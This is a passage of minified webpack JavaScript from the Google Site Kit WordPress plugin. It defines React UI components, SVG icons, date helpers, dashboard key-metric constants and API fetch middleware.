t=(0,n.useContext)(r.A),[i,l]=(0,n.useState)(!1),c=(0,s.A)(e=>e(a.n).getInViewResetCount()),g=(0,s.A)(e=>e(a.n).getValue("forceInView"));return(0,n.useEffect)(()=>{t.value&&!i&&l(!0)},[i,t,l]),(0,n.useEffect)(()=>{g&&l(!0)},[g]),(0,o.A)(()=>{l(!1)},[c]),!(!e||!i)||!!t.value}},85149:(e,t,i)=>{i.d(t,{A:()=>__WEBPACK_DEFAULT_EXPORT__});var o,s,n=i(63696);function r(){return r=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var i=arguments[t];for(var o in i)({}).hasOwnProperty.call(i,o)&&(e[o]=i[o])}return e},r.apply(null,arguments)}const __WEBPACK_DEFAULT_EXPORT__=e=>n.createElement("svg",r({xmlns:"http://www.w3.org/2000/svg",fill:"currentColor","aria-labelledby":"warning-title warning-desc",viewBox:"0 0 24 24"},e),o||(o=n.createElement("path",{fill:"none",d:"M0 0h24v24H0z"})),s||(s=n.createElement("path",{d:"M12 2C6.48 2 2 6.48 2 12s4.48 10 10 10 10-4.48 10-10S17.52 2 12 2m1 15h-2v-2h2zm0-4h-2V7h2z"})))},88176:e=>{e.exports=googlesitekit.widgets},88273:(e,t,i)=>{i.d(t,{U:()=>s,i:()=>o});const o="core/modules",s="insufficient_module_dependencies"},89065:(e,t,i)=>{i.d(t,{A:()=>SurveyViewTrigger});var o=i(63696),s=i(62688),n=i.n(s),r=i(50539),a=i(97345);function SurveyViewTrigger({triggerID:e,ttl:t=0}){const{triggerSurvey:i}=(0,r.useDispatch)(a.oR);return(0,o.useEffect)(()=>{i(e,{ttl:t})},[e,t,i]),null}SurveyViewTrigger.propTypes={triggerID:n().string.isRequired,ttl:n().number}},90187:(e,t,i)=>{i.d(t,{default:()=>m});var o=i(19371),s=i.n(o),n=i(58433);const r=function(e){const t=Object.keys(e).reduce((t,i)=>(t[(0,n.F)(i)]=e[i],t),{});let i=!1;return(e,o)=>{if(i)return o(e);setTimeout(()=>{i=!0},3e3);const{parse:s=!0}=e,r=e.path;if("string"==typeof e.path){const i=e.method?.toUpperCase()||"GET",o=(0,n.F)(r);if(s&&"GET"===i&&t[o]){const e=Promise.resolve(t[o].body);return delete t[o],e}if("OPTIONS"===i&&t[i]&&t[i][o]){const e=Promise.resolve(t[i][o]);return delete t[i][o],e}}return o(e)}};var a=i(45019),l=i.n(a);const c=function(e={}){const{onDuplicate:t}=e,i=new(l());return function(e,o){const s=i.get(e);if(s instanceof Promise)return t?.(e),s;const n=o(e);return i.set(e,n),n.catch(()=>{}).finally(()=>{i.delete(e)}),n}},{nonce:g,nonceEndpoint:d,preloadedData:u,rootURL:p}=i.g._googlesitekitAPIFetchData||{};s().nonceEndpoint=d,s().nonceMiddleware=s().createNonceMiddleware(g),s().rootURLMiddleware=s().createRootURLMiddleware(p),s().dedupeMiddleware=c({onDuplicate:function(e){i.g.console.warn("Google Site Kit API: duplicate request",e)}}),s().preloadingMiddleware=r(u),s().use(s().nonceMiddleware),s().use(s().mediaUploadMiddleware),s().use(s().rootURLMiddleware),s().use(s().dedupeMiddleware),s().use(s().preloadingMiddleware);const m=s()},94656:(e,t,i)=>{i.d(t,{A:()=>l});var o=i(47209),s=i(62688),n=i.n(s),r=i(63696),a=i(78325);function Portal({children:e,slug:t}){const[i]=(0,r.useState)(document.createElement("div"));return(0,o.A)(()=>{t&&i.classList.add(`googlesitekit-portal-${t}`);const e=document.querySelector(".googlesitekit-plugin")||document.body;return e.appendChild(i),()=>e.removeChild(i)}),(0,a.createPortal)(e,i)}Portal.propTypes={slug:n().string,children:n().node},Portal.defaultProps={slug:"",children:null};const l=Portal},97345:(e,t,i)=>{i.d(t,{$8:()=>r,$Q:()=>p,BT:()=>E,CQ:()=>A,DF:()=>Q,GM:()=>N,GT:()=>f,HA:()=>O,HD:()=>u,HP:()=>_,J5:()=>z,JF:()=>x,JK:()=>y,Ml:()=>I,SS:()=>R,UF:()=>g,UY:()=>B,Vl:()=>L,W6:()=>Y,Xq:()=>C,YQ:()=>D,Yw:()=>W,dV:()=>w,dX:()=>b,ej:()=>c,em:()=>n,ep:()=>v,fu:()=>k,gC:()=>M,hz:()=>m,jx:()=>d,lV:()=>l,nH:()=>G,oR:()=>o,od:()=>a,p3:()=>h,pG:()=>S,qv:()=>s,qy:()=>T,t1:()=>H,t7:()=>U,tB:()=>j,tK:()=>Z,u_:()=>P});const o="core/user",s="connected_url_mismatch",n="__global",r="temporary_persist_permission_error",a="adblocker_active",l=["weekly","monthly","quarterly"],c="googlesitekit_authenticate",g="googlesitekit_setup",d="googlesitekit_view_dashboard",u="googlesitekit_manage_options",p="googlesitekit_read_shared_module_data",m="googlesitekit_manage_module_sharing_options",I="googlesitekit_delegate_module_sharing_management",y="googlesitekit_update_plugins",h="kmAnalyticsAdSenseTopEarningContent",f="kmAnalyticsEngagedTrafficSource",M="kmAnalyticsLeastEngagingPages",k="kmAnalyticsNewVisitors",j="kmAnalyticsPopularAuthors",v="kmAnalyticsPopularContent",S="kmAnalyticsPopularProducts",b="kmAnalyticsReturningVisitors",N="kmAnalyticsTopCities",A="kmAnalyticsTopCitiesDrivingLeads",C="kmAnalyticsTopCitiesDrivingAddToCart",x="kmAnalyticsTopCitiesDrivingPurchases",D="kmAnalyticsTopDeviceDrivingPurchases",T="kmAnalyticsTopConvertingTrafficSource",w="kmAnalyticsTopCountries",_="kmAnalyticsTopPagesDrivingLeads",E="kmAnalyticsTopRecentTrendingPages",R="kmAnalyticsTopTrafficSource",L="kmAnalyticsTopTrafficSourceDrivingAddToCart",P="kmAnalyticsTopTrafficSourceDrivingLeads",O="kmAnalyticsTopTrafficSourceDrivingPurchases",G="kmAnalyticsPagesPerVisit",z="kmAnalyticsVisitLength",Z="kmAnalyticsTopReturningVisitorPages",U="kmSearchConsolePopularKeywords",W="kmAnalyticsVisitsPerVisitor",B="kmAnalyticsMostEngagingPages",H="kmAnalyticsTopCategories",Y=[h,f,M,k,j,v,S,b,H,N,A,C,x,D,T,w,E,R,L,G,z,Z,W,B,H],Q=[...Y,U]},97513:(e,t,i)=>{i.d(t,{Fo:()=>n,Lg:()=>r,Qb:()=>s,dv:()=>l,mp:()=>a});var o=i(24355);const s="xlarge",n="desktop",r="tablet",a="small";function l(){const e=(0,o.SO)();return e>1280?s:e>960?n:e>600?r:a}},98117:(e,t,i)=>{i.d(t,{A:()=>SettingsStatuses});var o=i(62688),s=i.n(o),n=i(82871),r=i(49383),a=i(33052),l=i(62540);function SettingsStatuses({statuses:e}){if(!e||0===e.length)return null;function t(e){return void 0===e?(0,l.jsx)("div",{className:"googlesitekit-settings-module__meta-item-data",children:(0,l.jsx)(r.ProgressBar,{})}):(0,l.jsx)("p",{className:"googlesitekit-settings-module__meta-item-data",children:e?(0,n.__)("Enabled","google-site-kit"):(0,n.__)("Disabled","google-site-kit")})}return(0,l.jsx)("div",{className:"googlesitekit-settings-module__meta-items",children:e.map(({label:e,status:i})=>(0,l.jsxs)("div",{className:"googlesitekit-settings-module__meta-item",children:[(0,l.jsx)(a.A,{as:"h5",size:"medium",type:"label",className:"googlesitekit-settings-module__meta-item-type",children:e}),t(i)]},e))})}SettingsStatuses.propTypes={statuses:s().arrayOf(s().shape({label:s().string.isRequired,status:s().oneOf([void 0,!0,!1])}))}}},e=>{e.O(0,[660],()=>{return t=43127,e(e.s=t);var t});e.O()}]);"use strict";(globalThis.__googlesitekit_webpackJsonp=globalThis.__googlesitekit_webpackJsonp||[]).push([[722],{6109:(e,t,i)=>{i.d(t,{tt:()=>T,Jg:()=>x,Gp:()=>k,GH:()=>j,r0:()=>b,Du:()=>v,Zf:()=>U,Cn:()=>L,G7:()=>h,vH:()=>I,N_:()=>E,zh:()=>Q,mK:()=>g.mK,Ql:()=>D,vY:()=>P,sq:()=>S,VZ:()=>B.VZ,JK:()=>g.JK,IS:()=>C,pH:()=>B.pH,kf:()=>Y,O5:()=>z,Qr:()=>A,x6:()=>Z,K5:()=>g.K5,S_:()=>m,dc:()=>B.dc,Eo:()=>g.Eo,jq:()=>g.jq,DK:()=>H.D,N9:()=>G,p9:()=>r.p,XH:()=>w,Zm:()=>l,sx:()=>o.sx,BI:()=>o.BI,CZ:()=>r.C,BG:()=>V});var n=i(17243),o=i(65054),r=i(50477),s=i(10523),a=i.n(s);function l(e){return a()(JSON.stringify(c(e)))}function c(e){const t={};return Object.keys(e).sort().forEach(i=>{let n=e[i];n&&"object"==typeof n&&!Array.isArray(n)&&(n=c(n)),t[i]=n}),t}var g=i(49746);function d(e){return e.replace(new RegExp("\\[([^\\]]+)\\]\\((https?://[^/]+\\.\\w+/?.*?)\\)","gi"),'<a href="$2" target="_blank" rel="noopener noreferrer">$1</a>')}function u(e){return`<p>${e.replace(/\n{2,}/g,"</p><p>")}</p>`}function p(e){return e.replace(/\n/gi,"<br>")}function m(e){const t=[d,u,p];let i=e;for(const e of t)i=e(i);return i}function I(e){return e=parseFloat(e),isNaN(e)||0===e?[0,0,0,0]:[Math.floor(e/60/60),Math.floor(e/60%60),Math.floor(e%60),Math.floor(1e3*e)-1e3*Math.floor(e)]}function h(e){const t=e&&!Number.isInteger(e)?new Date(e).getTime():e;return isNaN(t)||!t?0:t}var y=i(32091),M=i.n(y),N=i(82871);const f="Date param must construct to a valid date instance or be a valid date instance itself.",j="Invalid dateString parameter, it must be a string.",k='Invalid date range, it must be a string with the format "last-x-days".',b=60,x=60*b,T=24*x,v=7*T;function D(){function e(e){return(0,N.sprintf)(/* translators: %s: number of days */ /* translators: %s: number of days */ (0,N._n)("Last %s day","Last %s days",e,"google-site-kit"),e)}return{"last-7-days":{slug:"last-7-days",label:e(7),days:7},"last-14-days":{slug:"last-14-days",label:e(14),days:14},"last-28-days":{slug:"last-28-days",label:e(28),days:28},"last-90-days":{slug:"last-90-days",label:e(90),days:90}}}function A(e=""){if(!(0,n.isString)(e))return!1;if(3!==e.split("-").length)return!1;const t=new Date(e);return(0,n.isDate)(t)&&!isNaN(t)}function S(e){M()((0,n.isDate)(e)&&!isNaN(e),f);const t=`${e.getMonth()+1}`,i=`${e.getDate()}`;return[e.getFullYear(),t.length<2?`0${t}`:t,i.length<2?`0${i}`:i].join("-")}function w(e){M()(A(e),j);const[t,i,n]=e.split("-");return new Date(t,i-1,n)}function C(e,t){return S(E(e,t*T))}function z(e){const t=e.split("-");return 3===t.length&&"last"===t[0]&&!Number.isNaN(t[1])&&!Number.isNaN(parseFloat(t[1]))&&"days"===t[2]}function E(e,t){M()(A(e)||(0,n.isDate)(e)&&!isNaN(e),j);const i=A(e)?Date.parse(e):e.getTime();return new Date(i-1e3*t)}var _=i(78159),O=i(38017),R=i(62540);function P(e,t={}){if(Number.isNaN(Number(e)))return"";const{invertColor:i=!1}=t;return(0,_.Ay)((0,R.jsx)(O.A,{direction:e>0?"up":"down",invertColor:i}))}function L(e,t){return e>0&&t>0?e/t-1:e>0?1:t>0?-1:0}var B=i(48276);function Z(e){const t=parseFloat(e)||0;return!!Number.isInteger(t)&&t>0}function Y(e){if("number"==typeof e)return!0;const t=(e||"").toString();return!!t&&!isNaN(t)}function G(e){return Array.isArray(e)?[...e].sort():e}var H=i(11193);function U(e,t){function i(e){return"0"===e||0===e}if(i(e)&&i(t))return 0;if(i(e)||Number.isNaN(e))return null;const n=(t-e)/e;return Number.isNaN(n)||!Number.isFinite(n)?null:n}function V(e){try{return JSON.parse(e)&&!!e}catch(e){return!1}}function Q(e){if(!e)return"";const t=e.replace(/&#(\d+);/g,(e,t)=>String.fromCharCode(t)).replace(/(\\)/g,"");return(0,n.unescape)(t)}},6730:(e,t,i)=>{i.d(t,{A:()=>GenericErrorHandlerActions});var n=i(62688),o=i.n(n),r=i(82871),s=i(38432),a=i(38021),l=i.n(a),c=i(63696),g=i(12417),d=i(1027),u=i(65123),p=i(49383),m=i(62540);function ReportErrorButton({message:e,componentStack:t}){const[i,n]=(0,c.useState)(!1);return(0,m.jsx)(p.Button,{"aria-label":i?(0,r.__)("Error message copied to clipboard. Click to copy the error message again.","google-site-kit"):void 0,onClick:function(){l()(`\`\`\`\n${e}\n${t}\n\`\`\``),n(!0)},trailingIcon:(0,m.jsx)(g.A,{className:"mdc-button__icon",icon:i?d.A:u.A}),children:i?(0,r.__)("Copied to clipboard","google-site-kit"):(0,r.__)("Copy error contents","google-site-kit")})}ReportErrorButton.propTypes={message:o().string,componentStack:o().string};const I=ReportErrorButton;function GenericErrorHandlerActions({message:e,componentStack:t}){return(0,m.jsxs)("div",{className:"googlesitekit-generic-error-handler-actions",children:[(0,m.jsx)(I,{message:e,componentStack:t}),(0,m.jsx)(s.A,{href:"https://wordpress.org/support/plugin/google-site-kit/",external:!0,children:(0,r.__)("Report this problem","google-site-kit")})]})}GenericErrorHandlerActions.propTypes={message:o().string,componentStack:o().string}},7972:(e,t,i)=>{i.d(t,{F:()=>o,n:()=>n});const n="core/ui",o="activeContextID"},8513:(e,t,i)=>{i.d(t,{Kk:()=>r,SZ:()=>n,Yw:()=>s,oJ:()=>a,tT:()=>o});const n="body",o=[n,"display","headline","label","title"],r="small",s="medium",a=[r,s,"large"]},8732:(e,t,i)=>{i.d(t,{$:()=>r,D:()=>o});var n=i(20697);const o="core/notifications",r=[n.uR,n.jU,n.f7,n.Ax,n.Is]},10740:(e,t,i)=>{i.d(t,{$z:()=>o.$,CR:()=>a.C,Cf:()=>l.DialogContent,Es:()=>l.DialogFooter,Nv:()=>n.N,P3:()=>s.P,Si:()=>r.S,fI:()=>g.fI,fh:()=>g.fh,lG:()=>c.a,xA:()=>g.xA});var n=i(91046),o=i(3412),r=i(30454),s=i(26569),a=i(56655),l=i(12786),c=i.n(l),g=i(84984)},11193:(e,t,i)=>{i.d(t,{D:()=>r});var n=i(32091),o=i.n(n);function r(e,{dateRangeLength:t}){o()(Array.isArray(e),"report must be an array to partition."),o()(Number.isInteger(t)&&t>0,"dateRangeLength must be a positive integer.");const i=-1*t;return{currentRange:e.slice(i),compareRange:e.slice(2*i,i)}}},11999:(e,t,i)=>{i.d(t,{s:()=>n});const n="core/forms"},19793:(e,t,i)=>{i.d(t,{A:()=>__WEBPACK_DEFAULT_EXPORT__});var n,o=i(63696);function r(){return r=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var i=arguments[t];for(var n in i)({}).hasOwnProperty.call(i,n)&&(e[n]=i[n])}return e},r.apply(null,arguments)}const __WEBPACK_DEFAULT_EXPORT__=e=>o.createElement("svg",r({xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},e),n||(n=o.createElement("path",{fill:"currentColor",fillRule:"evenodd",d:"M12 1C5.925 1 1 5.925 1 12s4.925 11 11 11 11-4.925 11-11S18.075 1 12 1m4.806 8.592.592-.806-1.612-1.184-.592.806-3.89 5.296c-.166.226-.36.296-.512.296s-.346-.07-.512-.296l-1.474-2.007-.592-.806-1.612 1.184.592.806 1.474 2.007C9.191 15.6 9.971 16 10.792 16s1.6-.4 2.124-1.112z",clipRule:"evenodd"})))},19826:(e,t,i)=>{i.d(t,{Ay:()=>s,Kq:()=>r});const n=(0,i(63696).createContext)(""),{Consumer:o,Provider:r}=n,s=n},20697:(e,t,i)=>{i.d(t,{Ax:()=>r,CZ:()=>g,Ej:()=>b,Gw:()=>x,Is:()=>s,KK:()=>u,Nn:()=>v,OT:()=>j,SH:()=>f,Y$:()=>p,ZS:()=>a,bg:()=>h,en:()=>k,ep:()=>I,f7:()=>o,hi:()=>m,jU:()=>n,k$:()=>M,kz:()=>T,ly:()=>l,mo:()=>y,s3:()=>N,uR:()=>c,zx:()=>d});const n="mainDashboard",o="entityDashboard",r="mainDashboardViewOnly",s="entityDashboardViewOnly",a="userInput",l="activation",c="splash",g="adminBar",d="adminBarViewOnly",u="settings",p="adBlockingRecovery",m="wpDashboard",I="wpDashboardViewOnly",h="moduleSetup",y="metricSelection",M="wpBlockEditor",N="keyMetricsSetup",f="key-metrics",j="traffic",k="content",b="speed",x="monetization",T=[n,o,r,s,a,c,u,h,y],v=[r,s,d,I]},20762:(e,t,i)=>{i.d(t,{Ay:()=>s});var n=i(52735);const{Consumer:o,Provider:r}=n.A,s=r},24355:(e,t,i)=>{i.d(t,{SO:()=>a});var n=i(55620),o=i(99123);function r(){return[i.g.innerWidth,i.g.innerHeight]}function s({fps:e=60,leading:t=!1,initialWidth:i=0,initialHeight:s=0}={}){const[a,l]=(0,n._)("undefined"==typeof document?[i,s]:r,e,t);function c(){return l(r)}return(0,o.A)(window,"resize",c),(0,o.A)(window,"orientationchange",c),a}function a(e={}){return s(e)[0]}},25797:(e,t,i)=>{i.d(t,{A:()=>N});var n,o=i(62688),r=i.n(o),s=i(4452),a=i.n(s),l=i(63696),c=i(19793);function g(){return g=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var i=arguments[t];for(var n in i)({}).hasOwnProperty.call(i,n)&&(e[n]=i[n])}return e},g.apply(null,arguments)}const warning_notice=e=>l.createElement("svg",g({xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},e),n||(n=l.createElement("path",{fill:"currentColor",d:"M12 1c6.075 0 11 4.925 11 11s-4.925 11-11 11S1 18.075 1 12 5.925 1 12 1m0 14a1.5 1.5 0 1 0 0 3 1.5 1.5 0 0 0 0-3m-1-2h2V6h-2z"})));var d=i(42343),u=i(76984),p=i(62540);const m={[u.Q.NEW]:d.A,[u.Q.SUCCESS]:c.A,[u.Q.INFO]:warning_notice,[u.Q.WARNING]:warning_notice,[u.Q.ERROR]:warning_notice};function Icon({type:e}){const t=m[e]||warning_notice;return(0,p.jsx)(t,{width:24,height:24})}function Title({className:e,children:t}){return(0,p.jsx)("p",{className:a()("googlesitekit-notice__title",e),children:t})}function Description({className:e,children:t}){return(0,p.jsx)("p",{className:a()("googlesitekit-notice__description",e),children:t})}Icon.propTypes={type:r().oneOf(Object.values(u.Q))},Title.propTypes={className:r().string,children:r().node},Description.propTypes={className:r().string,children:r().node};var I=i(49383),h=i(83366);function CTAButton({label:e,disabled:t,inProgress:i,onClick:n,href:o,external:r=!1,hideExternalIndicator:s=!1}){let l;return r&&!s&&(l=(0,p.jsx)(h.A,{width:14,height:14})),(0,p.jsx)(I.SpinnerButton,{className:a()("googlesitekit-notice__cta",{"googlesitekit-notice__cta--spinner__running":i}),disabled:t,isSaving:i,onClick:n,href:o,target:r?"_blank":void 0,trailingIcon:l,children:e})}CTAButton.propTypes={label:r().string.isRequired,disabled:r().bool,inProgress:r().bool,onClick:r().func,href:r().string,external:r().bool,hideExternalIndicator:r().bool};var y=i(82871);function DismissButton({label:e=(0,y.__)("Got it","google-site-kit"),onClick:t,disabled:i}){return(0,p.jsx)(I.Button,{onClick:t,disabled:i,tertiary:!0,children:e})}DismissButton.propTypes={label:r().string,onClick:r().func.isRequired,disabled:r().bool};const M=(0,l.forwardRef)(({className:e,title:t,description:i,dismissButton:n,ctaButton:o,type:r=u.Q.INFO,children:s,hideIcon:l},c)=>(0,p.jsxs)("div",{ref:c,className:a()("googlesitekit-notice",`googlesitekit-notice--${r}`,e),children:[!l&&(0,p.jsx)("div",{className:"googlesitekit-notice__icon",children:(0,p.jsx)(Icon,{type:r})}),(0,p.jsxs)("div",{className:"googlesitekit-notice__content",children:[t&&(0,p.jsx)(Title,{children:t}),i&&(0,p.jsx)(Description,{children:i})]}),(n?.label||n?.onClick||o?.label&&(o?.onClick||o?.href)||s)&&(0,p.jsxs)("div",{className:"googlesitekit-notice__action",children:[s,(n?.label||n?.onClick)&&(0,p.jsx)(DismissButton,{label:n.label,onClick:n.onClick,disabled:n.disabled}),o?.label&&(o?.onClick||o?.href)&&(0,p.jsx)(CTAButton,{label:o.label,onClick:o.onClick,inProgress:o.inProgress,disabled:o.disabled,href:o.href,external:o.external,hideExternalIndicator:o.hideExternalIndicator})]})]}));M.TYPES=u.Q,M.propTypes={className:r().string,title:r().oneOfType([r().string,r().object]),description:r().node,type:r().oneOf(Object.values(u.Q)),dismissButton:r().shape(DismissButton.propTypes),ctaButton:r().shape({...CTAButton.propTypes,label:r().string}),children:r().node,hideIcon:r().bool};const N=M},29785:(e,t,i)=>{i.d(t,{O4:()=>n,OQ:()=>r,qc:()=>o});const n="core/site",o="primary",r="secondary"},32266:(e,t,i)=>{var n=i(131),o=i(78325),r=i(63696),s=i(82871),a=i(50539),l=i(49383),c=i(44436),g=i(10740),d=i(6109),u=i(29785),p=i(97345),m=i(70301),I=i(62659),h=i(33052),y=i(62540);function ActivationApp(){const{navigateTo:e}=(0,a.useDispatch)(m.M),t=(0,I.A)(),i=(0,a.useSelect)(e=>e(u.O4).getAdminURL("googlesitekit-dashboard")),n=(0,a.useSelect)(e=>e(u.O4).getAdminURL("googlesitekit-splash")),o=(0,a.useSelect)(e=>e(p.oR).hasCapability(p.jx)),[M,N]=(0,r.useState)(!1),f=o?i:n,j=o?(0,s.__)("Go to dashboard","google-site-kit"):(0,s.__)("Start setup","google-site-kit");(0,r.useEffect)(()=>{!M&&f&&((0,d.sx)(t,"view_notification"),N(!0))},[t,f,M]);const k=(0,r.useCallback)(async i=>{i.preventDefault();const n=o?"dashboard":"splash";await(0,d.sx)(t,"confirm_notification",n),e(f)},[f,o,e,t]);return f?(0,y.jsx)(g.xA,{children:(0,y.jsx)(g.fI,{children:(0,y.jsxs)(g.fh,{size:12,children:[(0,y.jsx)(c.A,{}),(0,y.jsx)(h.A,{as:"h3",size:"small",type:"headline",className:"googlesitekit-activation__title",children:(0,s.__)("Congratulations, the Site Kit plugin is now activated","google-site-kit")}),(0,y.jsx)(l.Button,{id:"start-setup-link",className:"googlesitekit-start-setup",onClick:k,children:j})]})})}):null}var M=i(20697),N=i(63081);(0,n.A)(()=>{const e=document.getElementById("js-googlesitekit-activation");e&&((0,o.render)((0,y.jsx)(N.A,{viewContext:M.ly,children:(0,y.jsx)(ActivationApp,{})}),e),e.classList.remove("googlesitekit-activation--loading"))})},33052:(e,t,i)=>{i.d(t,{A:()=>Typography});var n=i(62688),o=i.n(n),r=i(4452),s=i.n(r),a=i(8513),l=i(62540);function Typography({className:e,type:t,size:i,as:n="span",children:o,...r}){return(0,l.jsx)(n,{className:s()("googlesitekit-typography",e,{[`googlesitekit-typography--${t}`]:t&&a.tT.includes(t),[`googlesitekit-typography--${i}`]:i&&a.oJ.includes(i)}),...r,children:o})}Typography.propTypes={className:o().string,type:o().oneOf(a.tT),size:o().oneOf(a.oJ),as:o().oneOfType([o().string,o().elementType])}},38017:(e,t,i)=>{i.d(t,{A:()=>l});var n=i(62688),o=i.n(n),r=i(4452),s=i.n(r),a=i(62540);function ChangeArrow({direction:e,invertColor:t,width:i,height:n}){return(0,a.jsx)("svg",{className:s()("googlesitekit-change-arrow",`googlesitekit-change-arrow--${e}`,{"googlesitekit-change-arrow--inverted-color":t}),width:i,height:n,viewBox:"0 0 10 10",fill:"none",xmlns:"http://www.w3.org/2000/svg",children:(0,a.jsx)("path",{d:"M5.625 10L5.625 2.375L9.125 5.875L10 5L5 -1.76555e-07L-2.7055e-07 5L0.875 5.875L4.375 2.375L4.375 10L5.625 10Z",fill:"currentColor"})})}ChangeArrow.propTypes={direction:o().string,invertColor:o().bool,width:o().number,height:o().number},ChangeArrow.defaultProps={direction:"up",invertColor:!1,width:9,height:9};const l=ChangeArrow},38432:(e,t,i)=>{i.d(t,{A:()=>A});var n,o=i(4452),r=i.n(o),s=i(62688),a=i.n(s),l=i(39941),c=i(63696),g=i(82871);function d(){return d=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var i=arguments[t];for(var n in i)({}).hasOwnProperty.call(i,n)&&(e[n]=i[n])}return e},d.apply(null,arguments)}const u=e=>c.createElement("svg",d({xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 13 13"},e),n||(n=c.createElement("g",{fill:"none",fillRule:"evenodd"},c.createElement("circle",{cx:6.5,cy:6.5,r:6.5,fill:"currentColor"}),c.createElement("path",{fill:"#FFF",d:"M3.461 6.96h5.15L6.36 9.21a.464.464 0 0 0 .325.79.46.46 0 0 0 .325-.135l3.037-3.038a.46.46 0 0 0 0-.65L7.015 3.135a.46.46 0 0 0-.65.65L8.61 6.039H3.461a.46.46 0 0 0-.461.46c0 .254.207.462.461.462z"}),".")));var p;function m(){return m=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var i=arguments[t];for(var n in i)({}).hasOwnProperty.call(i,n)&&(e[n]=i[n])}return e},m.apply(null,arguments)}const I=e=>c.createElement("svg",m({xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 13 13"},e),p||(p=c.createElement("g",{fill:"none",fillRule:"evenodd"},c.createElement("circle",{cx:6.5,cy:6.5,r:6.5,fill:"#FFF"}),c.createElement("path",{fill:"currentColor",d:"M3.461 6.96h5.15L6.36 9.21a.464.464 0 0 0 .325.79.46.46 0 0 0 .325-.135l3.037-3.038a.46.46 0 0 0 0-.65L7.015 3.135a.46.46 0 0 0-.65.65L8.61 6.039H3.461a.46.46 0 0 0-.461.46c0 .254.207.462.461.462z"}),".")));var h;function y(){return y=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var i=arguments[t];for(var n in i)({}).hasOwnProperty.call(i,n)&&(e[n]=i[n])}return e},y.apply(null,arguments)}const M=e=>c.createElement("svg",y({xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},e),h||(h=c.createElement("path",{d:"m12 20-8-8 8-8 1.425 1.4-5.6 5.6H20v2H7.825l5.6 5.6z"})));var N=i(83366),f=i(50304),j=i(62540);const k="BUTTON",b="BUTTON_DISABLED",x="EXTERNAL_LINK",T="LINK",v="ROUTER_LINK",D=(0,c.forwardRef)((e,t)=>{const{"aria-label":i,secondary:n=!1,arrow:o=!1,back:s=!1,caps:a=!1,children:c,className:d="",danger:p=!1,disabled:m=!1,external:h=!1,hideExternalIndicator:y=!1,href:D="",inverse:A=!1,noFlex:S=!1,onClick:w,small:C=!1,standalone:z=!1,linkButton:E=!1,to:_,leadingIcon:O,trailingIcon:R,...P}=e;const L=D||_||!w?_?v:h?x:T:m?b:k;const B=L===k||L===b?"button":L===v?l.N_:"a",Z=function(){let e;return L===x&&(e=(0,g._x)("(opens in a new tab)","screen reader text","google-site-kit")),L===b&&(e=(0,g._x)("(disabled)","screen reader text","google-site-kit")),e?i?`${i} ${e}`:"string"==typeof c?`${c} ${e}`:void 0:i}();let Y=O,G=R;return s&&(Y=(0,j.jsx)(M,{width:14,height:14})),h&&!y&&(G=(0,j.jsx)(N.A,{width:14,height:14})),o&&!A&&(G=(0,j.jsx)(u,{width:14,height:14})),o&&A&&(G=(0,j.jsx)(I,{width:14,height:14})),(0,j.jsxs)(B,{"aria-label":Z,className:r()("googlesitekit-cta-link",d,{"googlesitekit-cta-link--secondary":n,"googlesitekit-cta-link--inverse":A,"googlesitekit-cta-link--small":C,"googlesitekit-cta-link--caps":a,"googlesitekit-cta-link--danger":p,"googlesitekit-cta-link--disabled":m,"googlesitekit-cta-link--standalone":z,"googlesitekit-cta-link--link-button":E,"googlesitekit-cta-link--no-flex":!!S}),disabled:m,href:L!==T&&L!==x||m?void 0:D,onClick:w,rel:L===x?"noopener noreferrer":void 0,ref:t,target:L===x?"_blank":void 0,to:_,...P,children:[!!Y&&(0,j.jsx)(f.A,{marginRight:5,children:Y}),(0,j.jsx)("span",{className:"googlesitekit-cta-link__contents",children:c}),!!G&&(0,j.jsx)(f.A,{marginLeft:5,children:G})]})});D.propTypes={arrow:a().bool,back:a().bool,caps:a().bool,children:a().node,className:a().string,danger:a().bool,disabled:a().bool,external:a().bool,hideExternalIndicator:a().bool,href:a().string,inverse:a().bool,leadingIcon:a().node,linkButton:a().bool,noFlex:a().bool,onClick:a().func,small:a().bool,standalone:a().bool,to:a().string,trailingIcon:a().node};const A=D},41671:(e,t,i)=>{i.d(t,{A:()=>l});var n=i(62688),o=i.n(n),r=i(82871),s=i(38432),a=i(97015);const LearnMoreLink=({className:e,external:t=!0,href:i,label:n=(0,r.__)("Learn more","google-site-kit"),onClick:o=()=>{}})=>i?a.createElement(s.A,{href:i,className:e,onClick:o,external:t},n):null;LearnMoreLink.propTypes={href:o().string.isRequired,className:o().string,label:o().string,external:o().bool,onClick:o().func};const l=LearnMoreLink},42343:(e,t,i)=>{i.d(t,{A:()=>__WEBPACK_DEFAULT_EXPORT__});var n,o=i(63696);function r(){return r=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var i=arguments[t];for(var n in i)({}).hasOwnProperty.call(i,n)&&(e[n]=i[n])}return e},r.apply(null,arguments)}const __WEBPACK_DEFAULT_EXPORT__=e=>o.createElement("svg",r({xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},e),n||(n=o.createElement("path",{fill:"currentColor",d:"m5.825 22 2.325-7.6L2 10h7.6L12 2l2.4 8H22l-6.15 4.4 2.325 7.6L12 17.3z"})))},44436:(e,t,i)=>{i.d(t,{A:()=>d});var n,o=i(82871),r=i(88933),s=i(63696);function a(){return a=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var i=arguments[t];for(var n in i)({}).hasOwnProperty.call(i,n)&&(e[n]=i[n])}return e},a.apply(null,arguments)}const l=e=>s.createElement("svg",a({xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 80 21"},e),n||(n=s.createElement("path",{fill:"#5F6368",d:"M62.09 1.664h3.038v.1L58.34 9.593l7.241 10.224v.1H62.7L56.755 11.4 53.95 14.64v5.278h-2.351V1.664h2.35v9.415h.1zM69.985 3.117c0 .454-.167.853-.488 